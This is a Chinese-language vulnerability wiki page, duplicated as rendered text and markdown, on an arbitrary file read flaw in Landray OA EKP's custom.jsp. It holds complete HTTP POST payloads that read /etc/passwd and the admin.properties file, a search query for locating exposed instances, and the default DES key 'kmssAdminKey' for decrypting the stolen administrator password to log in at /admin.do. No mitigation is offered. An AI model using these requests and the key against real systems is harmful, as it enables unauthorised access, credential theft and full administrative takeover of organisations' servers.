fofamini-wiki

登录白背景

源码

蓝凌OA EKP custom.jsp存在任意文件读取漏洞

一、漏洞简介

深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。

二、影响版本

蓝凌OA EKP

三、资产测绘

hunterapp.name="Landray 蓝凌OA"
特征

四、漏洞复现

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}

读取系统后台密码

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

由于蓝凌OA默认是DES加密，且默认密钥为 kmssAdminKey，所以只要拿着响应中的password值进行解密就好（返回的password字符串去掉末尾的/r再进行解密）
DES解密

http://tool.chacuo.net/cryptdes/

得到密码之后即可访问后台以管理员身份登入系统

/admin.do

原文: https://www.yuque.com/xiaokp7/ocvun2/wzihwkgkb5dnrl8d

# 蓝凌OA EKP custom.jsp存在任意文件读取漏洞

# 一、漏洞简介
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用该漏洞获取服务器敏感信息。

# 二、影响版本

- 蓝凌OA EKP

# 三、资产测绘

- hunter`app.name="Landray 蓝凌OA"`
- 特征

![image.png](./img/GipSrzp2WHC7mrWj/1699624430077-2cffea44-6670-4ae3-81c6-97bae85b26fd-613203.png)

# 四、漏洞复现
```
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"file:///etc/passwd"}}
```
![image.png](./img/GipSrzp2WHC7mrWj/1699624464241-0488152d-9c2f-4846-bffd-0729811ac77c-635702.png)
读取系统后台密码
```
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
```
![image.png](./img/GipSrzp2WHC7mrWj/1699624586356-4bf6f7cb-f6e2-4c21-84e3-2f60f4d79c3b-580141.png)
由于`蓝凌OA`默认是`DES`加密，且 默认密钥为 `kmssAdminKey`，所以只要拿着响应中的`password`值进行解密就好（返回的`password`字符串去掉末尾的`/r`再进行解密）
`DES`解密
```
http://tool.chacuo.net/cryptdes/
```
![image.png](./img/GipSrzp2WHC7mrWj/1699624734959-6ed0522d-7810-42a5-9888-cabc8e951991-957558.png)
得到密码之后即可访问后台以管理员身份登入系统
```
/admin.do
```
![image.png](./img/GipSrzp2WHC7mrWj/1699624779577-515db620-7224-40b6-9939-b7e5b5d24e53-405443.png)
![image.png](./img/GipSrzp2WHC7mrWj/1699624827902-6222adc0-6362-473a-b6d4-a561dd9d159e-937562.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wzihwkgkb5dnrl8d>